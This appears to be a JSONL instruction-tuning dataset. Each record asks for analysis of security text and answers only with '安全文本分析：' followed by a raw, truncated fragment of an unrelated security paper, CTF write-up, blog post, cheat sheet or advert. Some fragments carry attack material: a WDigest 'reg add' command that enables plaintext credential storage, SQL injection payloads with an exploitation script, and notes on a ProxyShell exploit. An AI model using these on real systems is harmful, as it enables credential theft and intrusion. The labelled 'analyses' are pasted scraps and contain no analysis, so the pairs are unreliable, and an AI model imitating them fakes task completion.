{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#proxyshell for workload 从发布上个文章后好多从那个文章加微信的朋友都提到了负载问题但是搬家没时 间看最近刚搬完家看了一下大致解决了这个问题顺便做一个记录脚本已公开至 个人 github https://github.com/wudicainiao/proxyshell-for-exchange_workload 0x02 Wsman 发送请求时有顺序的序列而遇到负载时这个特点会造成顺序发送请求时 有些请求发给了负载的其他机器从而造成 cmdlet 调用失败会报错如下 但是并不是所有这个报错的都是负载sid 认证失败后如果还持续发送请求也会报 该错误 具体看目标是否存在负载可查看 response header 中 X-CalculatedBETarget 的值是否 有变化就可知道目标是不是负载或大概有多少个负载服务器 这个问题上一开始并没有想到如何解决当时想着去看下 wsman 能不能压缩请求 次数看一下怎么改造这个库文件 之后又突然想到把思路颠倒一下实际上这个问题就如链接 webshell 时遇到的负载问 题一样逆向思维我们只要确保每个请求都发给了目标负载就可解决这个问题改造 原 poc主要的修改代码如下 测试执行 get-user 等有很多个请求包的 cmdlet已可稳定利用但是在针对有数十个 负载的目标时候还需要重新写一下脚本以提高效率 Ref: https://github.com/dmaasland/proxyshell-poc", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBypass KB2871997 0x01 KB2871997 1 2014513 2 2014 7 8 (CredSSP) 2973351 Microsoft 2919355 Windows 2975625 Microsoft 2919355 Windows 2014 9 9 2982378 Microsoft : Windows 7 Windows Server 2008 R2 2014 10 14 2984972 Windows 7 Windows Server 2008 R2 2984976 2592687 8.0 Windows 7 Windows Server 2008 R2 2984976 2984972 2984981 2830477 8.1 Windows 7 Windows Server 2008 R2 2984981 2984972 2973501 Windows 8Windows Server 2012 Windows RT 0x02 TokenLeakDetectDelaySecs 1 Win7Win8 1 TokenLeakDetectDelaySecs 2 WDigest 1 2 2 dword 30 30 3 3126593 (MS16-014) 3126593 TokenLeakDetectDelaySecs 0 0x03 WDigest 1 Wdigest WDigest UseLogonCredential UseLogonCredential 0WDigest 1 2Bypass KB2871997 Win7Server 2008 R2Windows 8 Server 2012 UseLogonCredential 1 Windows 8.1 Server 2012 R2 ( ,UseLogonCredential 0 WDigest UseLogonCredential 1 HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\TokenLeakDetectDela ySecs 1 HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDige st 1 reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f 1 0x04 KB2871997 1SID whoami /priv SID reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f 1 rundll32.exe user32.dll LockWorkStation 1 #include<windows.h> int main(){ LockWorkStation(); return 0; } 1 2 3 4 5 //cs desktop [explorer pid] x86|x64 low|high //msf migrate [explorer pid] screenshot 1 2 3 4 5 6 S-1-5-113: NT AUTHORITY\\Local S-1-5-114: NT AUTHORITY\\Local 1 2 SID S-1-5-113 S-1-5-114 Administrators 114 113 SID \"\"\" / 2Restricted Admin RDP Overpass-the-hash) Restricted Admin RDP Client Windows 8.1 Windows Server 2012 R2 Windows 7 Windows Server 2008 R2 KB2871997KB2973351 Restricted Admin mode (2) 13126593 2 (DisableRestrictedAdmin 0 1 ) Restricted Admin mod RDP Restricted Admin mode Pass the Hash with Remote Desktop Restricted Admin mode Windows Pass The Hash (Pass the Hash with Remote Desktop) Server Restricted Admin m", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Empire1 Web Exploitation, 400 points ## Description: > Psst, Agent 513, now that you're an employee of Evil Empire Co., try to get their secrets off the company website. https://2019shell1.picoctf.com/problem/45012/ Can you first find the secret code they assigned to you? ## Solution: The attached website provides registration and login pages, which do not seem to contain any vulnerabilities. After registering and signing in, the service allows submitting a TODO via the following form: ```html <form action=\"\" method=\"post\" class=\"form\" role=\"form\"> <input id=\"csrf_token\" name=\"csrf_token\" type=\"hidden\" value=\"IjI0ZjFiNTQ2ZmZiY2Q0ZTkzYzBlYTE4NWZmZjg5ZWFiNmVkMGM2ZDgi.XaDrHw.j2B7AzusTP7lPFthEkrCXCp-2qM\"> <div class=\"form-group required\"><label class=\"control-label\" for=\"item\">Todo?</label> <input class=\"form-control\" id=\"item\" name=\"item\" required type=\"text\" value=\"\"> </div> <input class=\"btn btn-default\" id=\"submit\" name=\"submit\" type=\"submit\" value=\"Create\"> </form> ``` The result is later available on another page, for example: ```html <h1 class=\"page-header\">Things You Gotta Do</h1> <ul class=\"list-unstyled\"> <div class=\"row\"> <div class=\"col-md-6\"> <div class=\"well well-sm\"> <li> <strong>Very Urgent:</strong> Test </li> </div> </div> </div> </ul> ``` The \"Very Urgent:\" prefix is automatically prepended to any text provided by the user. After trying different strategies, I found that the page is vulnerable to SQL injection using the following syntax: ``` '||(SQL)||' ``` For example: ``` '||(select tbl_name FROM sqlite_master WHERE type='table' limit 0,1 COLLATE NOCASE)||' ``` Using the following interactive shell, it is possible to test different SQL queries and see the result: ```python import re import html import requests from cmd import Cmd from bs4 import BeautifulSoup class Empire1(object): BASE_URL = \"https://2019shell1.picoctf.com/problem/45012\" def __init__(self): self.session = requests.Session() def login(self, username, password): text = self.post(se", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPRESENTED BY:  Mandiant, A FireEye Company. All rights reserved. Investigating PowerShell Attacks Defcon 2014 (Pre-Conference Draft) Ryan Kazanciyan, Matt Hastings  Mandiant, A FireEye Company. All rights reserved. Background Case Study 2 Attacker Client Victim VPN WinRM, SMB, NetBIOS Victim workstations, servers Fortune 100 organization Compromised for > 3 years Active Directory Authenticated access to corporate VPN Command-and-control via Scheduled tasks Local execution of PowerShell scripts PowerShell Remoting  Mandiant, A FireEye Company. All rights reserved. It can do almost anything Why PowerShell? 3 Execute commands Reflectively load / inject code Download files from the internet Enumerate files Interact with the registry Interact with services Examine processes Retrieve event logs Access .NET framework Interface with Win32 API  Mandiant, A FireEye Company. All rights reserved. PowerSploit Reconnaissance Code execution DLL injection Credential harvesting Reverse engineering Nishang Posh-SecMod Veil-PowerView Metasploit More to come PowerShell Attack Tools 4  Mandiant, A FireEye Company. All rights reserved. PowerShell Malware in the Wild 5  Mandiant, A FireEye Company. All rights reserved. Investigation Methodology 6 evil.ps1 Local PowerShell script backdoor.ps1 Persistent PowerShell Registry File System Event Logs Memory Network Traffic Sources of Evidence WinRM PowerShell Remoting  Mandiant, A FireEye Company. All rights reserved. Has admin (local or domain) on target system Has network access to needed ports on target system Can use other remote command execution methods to: Enable execution of unsigned PS scripts Enable PS remoting Attacker Assumptions 7  Mandiant, A FireEye Company. All rights reserved. Version Reference 8 2.0 3.0 4.0 Default Default (R2) Default Default Default (SP1) Default (R2 SP1) Requires WMF 3.0 Update Requires WMF 3.0 Update Requires WMF 4.0 Update Requires WMF 4.0 Update Requires WMF 4.0 Update Memory Analysis  Mandiant, A FireEy", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDevil&is&in&the&Details:&Revealing&How& Linux&Kernel&put_user at&Risk Edward&Lo&and&Chiachih Wu C0RE&Team About&Us  羅元琮 (Edward)  奇虎 360&安全研究開發工程師  專職內核漏洞挖掘與利用  360&超級 ROOT&技術負責人  吳家志 (@chiachih_wu)  奇虎 360&安全研究開發工程師  Android/Linux 系統安全研究  C0RE&Team&(c0reteam.org)&創始成員 CVE-2013-2094&(perf_swevent_init) CVE-2013-2597&(acdb) In&the&Summer&of&2013& CVE-2012-4220&(diag) CVE-2012-6422&(ExynosAbuse) Nothing&Beats&HTC&Desire&V&(t328w)! CVE-2013-6123&(video100) cvedetails.com cvedetails.com CVE-2009-2848 put_user(x,&addr)&on&ARM32  addr&is&checked&by&Hardware&with& STRT/STRBT/STRHT&Instructions  When&CONFIG_CPU_USE_DOMAINS&is&not&set,& put_user()&=&Arbitrary&Memory&Write In&the&Spring&of&2014& What&if&I&do&grep r&__put_user *&? CAUTION:&__put_user.*()&=&Arbitrary& Memory&Write Timetable Date Event put_user of/ Upstream/ Kernel/ put_user of Android/ Kernel __put_user_*/ w/o/explicit/ address/ validations 2010-11-04 T&macro&and&CONFIG_CPU_USE_DOMAINS&is& upstreamed& Vulnerable Vulnerable Vulnerable 2012-01-25 T&macro&is&renamed&to&TUSER Vulnerable Vulnerable Vulnerable 2012-09-09 !CONFIG_CPU_USE_DOMAINS&case&is&fixed Vulnerable Vulnerable 2013-07 put_user&vulnerability&is&identified&by&us& through&clone() Vulnerable Vulnerable 2013-09-11 The&incomplete&patch&to&fix&__put_user_*& vulnerability&is&upstreamed Vulnerable Vulnerable 2013-11-14 Most&Android&OS&maintainers&start&merging&the& patch&to&fix&!CONFIG_CPU_USE_DOMAINS&case& (CAF&disclose&the&details&of&CVE-2013-6282) Vulnerable 2016-7-31 __put_user_*&vulnerability&is&identified&by&us& through&code/patches&auditing Vulnerable 0-day  We&identify&a&0-day&in&the&ARM/Linux&kernel& (CVE-2016-3857) (contd)  Up&to&present&we&have&identified&that&two& Google&Nexus&phones&are&vulnerable:&Nexus&4,& and&Nexus&7&(2013&version)  Besides,&the&Huawei&Honor&4X/6/6&Plus&series,& Huawei&Ascend&Mate7&series,&and&some&other& models&of&Huawei,&Lenovo,&Meizu,&OPPO,& Samsung,&Sony,&Xiaomi devices&are&also& vulnerable (contd) Vendor Series Model G", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Python101 --- ## 加解密 **HASH** ```py import hashlib # md5, sha1, sha224, sha256, sha384, sha512 s = 'hello world' m = hashlib.md5() m.update(s.encode('utf8')) print(m.digest()) print(m.hexdigest()) # ripemd160, whirlpool s = 'hello world' m = hashlib.new('ripemd160', s.encode('utf8')) print(m.digest()) print(m.hexdigest()) ``` **RSA gmpy2** ```py import gmpy2 p = 168870409632549765296862502254899759857248288652407554850383477768823119986297924033151555409082356346297282197467254809081931208549224155851315637344747298357415893525472097154103238042019866682938382139834279447488738548244853184293595933654527554670457923545588565351501521501815389298997833861578226633099 q = 136505636991931352215759862754723380107419404176934963805672183755717752956589135238497377957828097441347957566489629211243389022288160648357324629288547621047463026266886900467398707294913322326802718447765393605735412855505214780439471729354761056917299208670362196028628829497574575055117449119342100056517 e = 65537 n = p * q fn = (p - 1) * (q - 1) d = gmpy2.invert(e, fn) # encode plain = \"hello world\" cipher = gmpy2.powmod(int(plain.hex(),16), e, n) print cipher # decode cipher = 17123126358168532314364171789745947147158203528255189528376034042576955961464108007241396193221317579386199055678187296416631757350036173529280264692509105557539380445658352098757386832691606291403716717255406122398828996166165137869000756490419628668837727171987655840934249710275220041791912411702429566338522067039808551028470065040909781794268938955092150084715883613062506445552253043511850366325327543440113474870896494812927181373067664361593089869517445577240126156141735331979758927134194252186254770372018574046630061371952143328299376196926784339615150604268752279279335534713614030849861471450015448322452 plaint = gmpy2.powmod(cipher, d, n) s = '%x' % plaint if len(s) % 2 != 0: s = '0' + s print(s) ``` --- ## 编码 **中文转十六进制** ```py >>> '测试'.encode('utf-8') b'\\xe6\\xb5\\x8b\\xe8\\xaf\\x95' ``` **字节数组与十六进制** ```py # 字节数组 by", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPacketFence, the Open Source NAC: What we've done in the last two years Salivating on NAC secret sauce Presentation Plan What's Network Access Control (NAC) The secret sauce The Open Source differentiator The good and the bad of 2 years as lead developer The Future of PacketFence (aka World Domination Roadmap) Community bonding! Who I am Olivier Bilodeau System architect working at Inverse inc PacketFence lead developer since 2009 Teaching InfoSec to undergraduate in Montreal ... new father, Open Source nuts, enjoying CTFs a lot, android developer, brewing beer Social stuff twitter: @packetfence / identi.ca: @plaxx delicious: plaxxx / linkedin: olivier.bilodeau What's Network Access Control (NAC) NAC elevator pitch NAC: Network Access (or Admission) Control Authentication Map usernames to IP addresses (or MAC addresses) Admission Allow, partially allow or deny users or devices Control Watch for unauthorized stuff Including: Outdated AV, patch-level, scanning corporate servers, spreading malware, ... Know who is using your network and making sure they behave What NAC has become Remediation of users Crush helpdesk costs by giving users their own path to fix their problems Guest management Asset/Inventory management Simplified access layer configuration Reduce network mgmt costs by centralizing decisions on a srv The secret sauce The technology Mostly Perl some PHP Leveraging open source* Designed with high-availability in mind active-passive clustering Key design decisions Out of band* Edge enforcement* No Agent Web-based captive portal Listen to everything Out of band At first, relying on SNMP Traps* next slide is about that LinkUp / LinkDown events MAC Nofication events Port-Security (SecurityViolation) events Then RADIUS-based techniques emerged Wireless MAC-Authentication* Wireless 802.1X* followed by Wired MAC-Auth and 802.1X Edge enforcement: SNMP Traps based Events on network hardware generates Traps PacketFence reacts on the traps Uses SNMP to authorize the MA", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAbusing Adobe Readers JavaScript APIs Brian Gorenc, Manager, Vulnerability Research AbdulAziz Hariri, Security Researcher Jasiel Spelman, Security Researcher Agenda  Introduction  Understanding the Attack Surface  Vulnerability Discovery  Constructing the Exploit Introduction Introduction 4 HP Zero Day Initiative AbdulAziz Hariri - @abdhariri Security Researcher at the Zero Day Initiative Root cause analysis, vulnerability discovery, and exploit development Jasiel Spelman - @WanderingGlitch Security Researcher at the Zero Day Initiative Root cause analysis, vulnerability discovery, and exploit development Brian Gorenc - @maliciousinput Head of Zero Day Initiative Organizer of Pwn2Own Hacking Competitions Research starting in December 2014 Bug Hunters Patched Vulnerabilities CVE-2015-5085, CVE-2015-5086, CVE-2015-5090, CVE-2015-5091, CVE-2015-4438, CVE-2015-4447, CVE-2015-4452, CVE-2015-5093, CVE-2015-5094, CVE-2015-5095, CVE-2015-5101, CVE-2015-5102, CVE-2015-5103, CVE-2015-5104, CVE-2015-5113, CVE-2015-5114, CVE-2015-5115, CVE-2015-5100, CVE-2015-5111, CVE-2015-4435, CVE-2015-4441, CVE-2015-4445, CVE-2015-3053, CVE-2015-3055, CVE-2015-3057, CVE-2015-3058, CVE-2015-3065, CVE-2015-3066, CVE-2015-3067, CVE-2015-3068, CVE-2015-3071, CVE-2015-3072, CVE-2015-3073, CVE-2015-3054, CVE-2015-3056, CVE-2015-3061, CVE-2015-3063, CVE-2015-3064, CVE-2015-3069, CVE-2015-3060, CVE-2015-3062 Unpatched Vulnerabilities ZDI-CAN-3051, ZDI-CAN-3050, ZDI-CAN-3049, ZDI-CAN-3048, ZDI-CAN-3047, ZDI-CAN-3046, ZDI-CAN-3043, ZDI-CAN-3036, ZDI-CAN-3022, ZDI-CAN-3021, ZDI-CAN-2019, ZDI-CAN-3018, ZDI-CAN-3017, ZDI-CAN-3016, ZDI-CAN-3015, ZDI-CAN-2998, ZDI-CAN-2997, ZDI-CAN-2958, ZDI-CAN-2816, ZDI-CAN-2892, ZDI-CAN-2893 more to come. 5 Understanding the Attack Surface Understanding Attack Surface 7 Prior research and resources  The life of an Adobe Reader JavaScript bug (CVE-2014-0521) - Gábor Molnár  First to highlight the JS API bypass issue  The bug was patched in APSB14-15 and was assigned CVE", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# CS-hAcked Category: Networks, 60 Points ## Description >``` uuuuuuu > uu$$$$$$$$$$$uu > uu$$$$$$$$$$$$$$$$$uu > u$$$$$$$$$$$$$$$$$$$$$u > u$$$$$$$$$$$$$$$$$$$$$$$u > u$$$$$$$$$$$$$$$$$$$$$$$$$u > u$$$$$$$$$$$$$$$$$$$$$$$$$u > u$$$$$$\" \"$$$\" \"$$$$$$u > \"$$$$\" u$u $$$$\" > $$$u u$u u$$$ > $$$u u$$$u u$$$ > \"$$$$uu$$$ $$$uu$$$$\" > \"$$$$$$$\" \"$$$$$$$\" > u$$$$$$$u$$$$$$$u > u$\"$\"$\"$\"$\"$\"$u > uuu $$u$ $ $ $ $u$$ uuu > u$$$$ $$$$$u$u$u$$$ u$$$$ > $$$$$uu \"$$$$$$$$$\" uu$$$$$$ > u$$$$$$$$$$$uu \"\"\"\"\" uuuu$$$$$$$$$$ > $$$$\"\"\"$$$$$$$$$$uuu uu$$$$$$$$$\"\"\"$$$\" > \"\"\" \"\"$$$$$$$$$$$uu \"\"$\"\"\" > uuuu \"\"$$$$$$$$$$uuu > u$$$uuu$$$$$$$$$uu \"\"$$$$$$$$$$$uuu$$$ > $$$$$$$$$$\"\"\"\" \"\"$$$$$$$$$$$\" > \"$$$$$\" \"\"$$$$\"\" > $$$\" $$$$\" > CS-hAcked > ``` > > Dear fellow, we've heard you've got some hacking skills - this is the time to use them ;) > > For some time now we've been investing great efforts to get a hold of an extremely dangerous hacking team network that goes by the name \"CS-hAcked\". > > According to our intelligence, we believe that on this network they transfer their secret combination - being used as a trigger to every major attack they commit. > > Recently we've come to a major breakthrough, successfully completing an operation to achieve remote control on one of the computers in the network. > > That's where you get into the picture. > > Your mission, should you choose to accept it, is to infiltrate their network using our implanted backdoor, and reveal once and for all the secret combination to finally get the secret flag. > > Thanks to our dedicated intelligence researchers we gathered the following information for you that might assist you: > > 1. We know the dictionary of words they've used over time. It's highly probable they'll use it for their current combination. > 2. Our backdoor PC credentials - IP: 3.126.154.76 , port:2222, username:csa, pass:123123 > 3. The flag server IP: 3.126.154.76 port: 80 > > And perhaps the following could help you as well: > * https://en.wikipedia", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n到了提笔写年终总结的时候和以前拼命想记录活状态不同这次我却不知道从哪开始写起就想到啥写啥 吧 北京 今年年初来到了北京没有了昔了朋友在北京还是很孤独的跨年夜我和朋友吃完晚饭说想找个地起 跨年竟然发现没有什么好去的地想到三屯离我们最近那边应该好玩打开打软件发现附近堵已经堵 了条街了瞬间打消了去意想买点东回家吃但是已经快10点附近超市什么的都关了也想不到买点 啥就这样两空空回到出租屋和好友们在游戏中度过了跨年的钟声 Hacking8安全信息流 写总结第个想到的就是总结下hacking8这是我今年花费时间最多的个东我得好好总结下从去年五 号写第代码到现在从中踩了不少坑和学到了不少东 去年的总结中 站很段时间都是开放注册需要解题才能获得邀请码这样很酷前注册数已经有700多了 每天约会有5个签到 平均每天会有200来个独IP访问 今年这个数字都翻倍了注册户到了 1700+ 每天约会有 40 签到站ip达到了 500-600  这不算是很的增不过对于我个来说还是很激动毕竟有越来越多的认可了hacking8 之前服务器部署些服务都抠抠搜搜今年索性买了台好点的服务器来持些研究也上了全索引让 搜索更加便 今年上半年花了很多时间在修改hacking8的bug上因为涉及户系统的操作代码量的成倍增加会web挂 了会爬挂了会要处理些具服务的bug服务挂掉后会通过 Bark 机提醒我但我把它声 提醒早早就关闭了因为有时候晚上会直响 常常就是早上醒来发现了提醒99+的错误消息然后每次都要重新登陆上服务器检查服务修改bug重启 服务 下半年我决改掉这些不想在过多去动操作了想让hacking8全程都动起来此时才明开发中动测试 的重要性于是做了键动部署/重启爬动测试爬失效状态动化的服务监测系统等等开发完后就 很少再登陆服务器检查错误了觉得还不错 新功能 常在做的还有不停的砍需求经过这么年hacking8的主体功能就是信息流的推送具外加些其他的辅 助功能平时我会有很多新的想法但奈何只有我业余开发维护很多想法突然来了灵感就想加上此 时我的另个脑袋就会拼命拉住我说不让弹会 所以什么周报总结github监控微信公众号监控等等都被我否掉了精实在有限之前还想模仿即刻做户 的圈社区写了个笔记记录了下想法之后也被我否掉了因为我还没有能能运营起个圈社区不能营 造那种氛围 Hacking8的界主体还是 bootstrap 框架搭建的年过去还是没有丝丝改变虽然较简陋看了也就习 惯了界上改变的就是把图标焕然新了把原先的 Font AweSome 换成了阿的 iconfont 也算是有个新 象 Hacking8在今年也加了些功能通常就是些想法将它实现为了在线的式 这些功能通常也都写了博客记录了如 加动化成器 https://x.hacking8.com/post-430.html CS上线器 https://x.hacking8.com/post-428.html dll2shellcode https://x.hacking8.com/post-413.html 8微信机器 刚开始做微信机器主要的是监控公众号的后有点想法想做个群聊机器对接信息流的最新数据于 学习定时推送或主动@机器推送然后机器第天就被加爆了被官控现在还没解封 写这篇章前天想到个点看在元旦能不能给安排上 微信公众号 公众号\"Hacking就是好玩\"在去年关注的有 2400+ 今年也整整番了倍有 4800+ 常读户 今年在公众号发了章27篇也刷新了我的记录每篇都是原创阅读量都在1000+ 收 有好多联系想在公众号投放告篇的价格在700左右挺诱的我想了想还是拒绝了写公众号是作为 个业余爱好有些东还是保持最初的样较好 通过 知识星球 的收也能够撑起 Hacking8信息流 和 公众号 的常维护了 作 作 今年换了作也聚集于安全开发上主要做windows的将红队中常的段以程化的式实现语在 GoCC++PythonNodeJs上切换前三个主要是写客户端Python主要写后端和些爬脚本node 和vue主要写 electron 在windows上没有写c#是个遗憾除必要我也不太想花精再学语了 公司氛围也很轻松所以有时间进各种的技术学习看了很多代码把它们些精华吸收了下记录在了博客 github和知识星球 github issue收集了不少感兴趣的资料 https://github.com/boy-hack/boy-hack/issues 回望下今年做了些什么这是今年我博客发表章的统计图和去年相章数量是增加的 今年把 projectdiscover 的项全都过了遍写了篇源码阅读分享在知识星球上我还布置了次有关扫描 器的作业 今年学习了逆向基于逆向对Go编译的进制进混淆基于逆向逆向yara和提取goby指纹这是最好玩的 事情之了 关于红队", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1123-win-使用soundrec音频收集 ## 来自ATT&CK的描述 攻击者可以利用计算机的外围设备例如麦克风和网络摄像头或应用程序例如语音和视频呼叫服务来捕获音频记录以便侦听敏感的对话用以收集信息 恶意软件或脚本可能用于通过操作系统或应用程序提供的可用API与设备进行交互以捕获音频音频文件可能会写入磁盘并在以后被泄漏 ## 测试案例 soundrec可以通过开发板采集声音并通过电脑端显示波形适用于 5402 dsp开发板 ## 检测日志 Windows安全日志sysmon日志 ## 测试复现 暂无 ## 测试留痕 暂无 ## 检测规则/思路 ### splunk规则 由于可能会使用各种API因此很难检测到此技术取决于正常使用系统的方式有关API使用的遥测数据可能没有用但可以为发生在系统上的其他潜在恶意活动提供上下文 可能指示技术使用的行为包括未知或异常的进程访问与与麦克风录音设备或录音软件交互的设备或软件相关联的API以及周期性地将包含音频数据的文件写入磁盘的进程 ```yml index=windows SourceName=Microsoft-Windows-PowerShell *WindowsAudioDevice-Powershell-Cmdlet* //use voice cmdlet in powershell index=windows source=WinEventLog:Microsoft-Windows-Sysmon/Operational (EventCode=1 Image=*\\\\explorer.exe CommandLine=*WindowsSoundRecorder*) OR (EventCode=1 Image=*\\\\soundrec.exe) // soundrecorder started with this command:explorer.exe shell:appsFolder\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe!App index=windows source=WinEventLog:Microsoft-Windows-Sysmon/Operational (EventCode=1 CommandLine=*/DURATION*) OR (EventCode=1 CommandLine=*/FILE*) // check all commandlines that used /DURATION and /FILE as a output file in it ``` ### 建议 如果你对windows以及powershell比较了解的话你可以使用Windows日志来完成监视检测当然最好的方法是使用Sysmon日志 ## 相关TIP [[T1123-win-使用AudioDeviceCmdlets进行音频收集]] ## 参考推荐 MITRE-ATT&CK-T1123 <https://attack.mitre.org/techniques/T1123/>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: Screen date: 2021-01-02 20:03:55 background: bg-emerald-500 tags: - terminal - session - utility categories: - Linux Command intro: | This is a quick reference guide cheat sheet for the screen command. plugins: - copyCode --- Getting Started --------------- ### Getting started ```shell script $ screen ``` 1\\. Press <kbd>Ctrl-A</kbd> <kbd>D</kbd> to detach session --- 2\\. List all screen sessions ```shell script $ screen -ls ``` 3\\. Re-attach a screen Session ```shell script $ screen -r <name/pid> ``` ### Options {.col-span-2} | Options | Example | Description | |---------|---------------------------------------|---------------------------------------------------------| | `-S` | screen -S debug | Start a new session with session name | | `-ls` | screen -ls | List running sessions / screens | | `-x` | screen -x | Attach to a running session | | `-r` | screen -r debug | Attach to a running session with name | | `-R` | screen -R debug | Attach to a session _(Will create if it doesn't exist)_ | | `-d` | screen -d -m wget xxxx.com/large.file | Start screen in detached mode | | `-X` | screen -X -S debug kill | Kill a running session | {.show-header} ### Help | Command | Description | |--------------|--------------------------------| | `Ctrl-A` `?` | See help _(Lists keybindings)_ | {.shortcuts} ### Window Management {.col-span-2 .row-span-2} | Command | Description | |----------------------------------------|-----------------------------------------| | `Ctrl-A` `C` | Create new window | | `Ctrl-A` `Ctrl-A` | Change to last-visited active window | | `Ctrl-A` `0...9` | Change to window by number | | `Ctrl-A` `'` `<0...9 or title>` | Change to window by number or name | | `Ctrl-A` `N` or `Ctrl-A` `<space>` | Change to next window in list | | `Ctrl-A` `P` or `Ctrl-A` `<backspace>` | Change to previous window in list | | `Ctrl-A` `\"` | See window list | | `Ctrl-A` `W` | Show window bar | | `Ctrl-A` `K` | Kill current window _(not recommended)_ | | `Ctrl-A` `\\` | Kill", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n本电子书为某站收费 VIP VIP VIP VIP 资源 由 灰鸽子网络资源分享社区 免费共享 灰鸽子网络资源分享社区,,,,致力为大家提供最新最全最优秀的网络资源 论坛主要负责提供各类优秀视频优秀书籍以及各类优秀源码资源 网赚编程逆向建站安全这几个大方向其中以 网赚编程逆向为主打方向 http://www.huigezi.cc http://www.huigezi.cc http://www.huigezi.cc http://www.huigezi.cc <<<< 近期论坛经常被某些收费站 DDOS DDOS DDOS DDOS 攻击 >>>> http://www.duominuo.cc http://www.duominuo.cc http://www.duominuo.cc http://www.duominuo.cc <<<< 如果论坛无法访问请尝试其他域名 >>>> http://www.52dmn.com http://www.52dmn.com http://www.52dmn.com http://www.52dmn.com <<<< 最好加群第一时间获知论坛动向 >>>> 官方群 55059882 ( 500 人群未满 ) 千人群暂不开放500 人群满后再开放)134624974 计算机精品学习资料大放送 软考官方指定教材及同步辅导书下载 | 软考历年真是解析与答案 软考视频 | 考试机构 | 考试时间安排 Java 一览无余Java 视频教程 | Java SE | Java EE .Net 技术精品资料下载汇总ASP.NET 篇 .Net 技术精品资料下载汇总C#语言篇 .Net 技术精品资料下载汇总VB.NET 篇 撼世出击C/C++编程语言学习资料尽收眼底 电子书+视频教程 Visual C++(VC/MFC)学习电子书及开发工具下载 Perl/CGI 脚本语言编程学习资源下载地址大全 Python 语言编程学习资料(电子书+视频教程)下载汇总 最新最全 RubyRuby on Rails 精品电子书等学习资料下载 数据库精品学习资源汇总MySQL 篇 | SQL Server 篇 | Oracle 篇 最强 HTML/xHTMLCSS 精品学习资料下载汇总 最新 JavaScriptAjax 典藏级学习资料下载分类汇总 网络最强 PHP 开发工具+电子书+视频教程等资料下载汇总 UML 学习电子资下载汇总 软件设计与开发人员必备 经典 LinuxCBT 视频教程系列 Linux 快速学习视频教程一帖通 天罗地网精品 Linux 学习资料大收集(电子书+视频教程) Linux 参考资源大系 Linux 系统管理员必备参考资料下载汇总 Linux shell内核及系统编程精品资料下载汇总 UNIX 操作系统精品学习资料<电子书+视频>分类总汇 FreeBSD/OpenBSD/NetBSD 精品学习资源索引 含书籍+视频 Solaris/OpenSolaris 电子书视频等精华资料下载索引 计算机精品学习资料大放送 软考官方指定教材及同步辅导书下载 | 软考历年真是解析与答案 软考视频 | 考试机构 | 考试时间安排 Java 一览无余Java 视频教程 | Java SE | Java EE .Net 技术精品资料下载汇总ASP.NET 篇 .Net 技术精品资料下载汇总C#语言篇 .Net 技术精品资料下载汇总VB.NET 篇 撼世出击C/C++编程语言学习资料尽收眼底 电子书+视频教程 Visual C++(VC/MFC)学习电子书及开发工具下载 Perl/CGI 脚本语言编程学习资源下载地址大全 Python 语言编程学习资料(电子书+视频教程)下载汇总 最新最全 RubyRuby on Rails 精品电子书等学习资料下载 数据库精品学习资源汇总MySQL 篇 | SQL Server 篇 | Oracle 篇 最强 HTML/xHTMLCSS 精品学习资料下载汇总 最新 JavaScriptAjax 典藏级学习资料下载分类汇总 网络最强 PHP 开发工具+电子书+视频教程等资料下载汇总 UML 学习电子资下载汇总 软件设计与开发人员必备 经典 LinuxCBT 视频教程系列 Linux 快速学习视频教程一帖通 天罗地网精品 Linux 学习资料大收集(电子书+视频教程) Linux 参考资源大系 Linux 系统管理员必备参考资料下载汇总 Linux shell内核及系统编程精品资料下载汇总 UNIX 操作系统精品学习资料<电子书+视频>分类总汇 FreeBSD/OpenBSD/NetBSD 精品学习资源索引 含书籍+视频 Solaris/OpenSolaris 电子书视频等精华资料下载索", "category": "text_analysis", "source": "security_papers"}
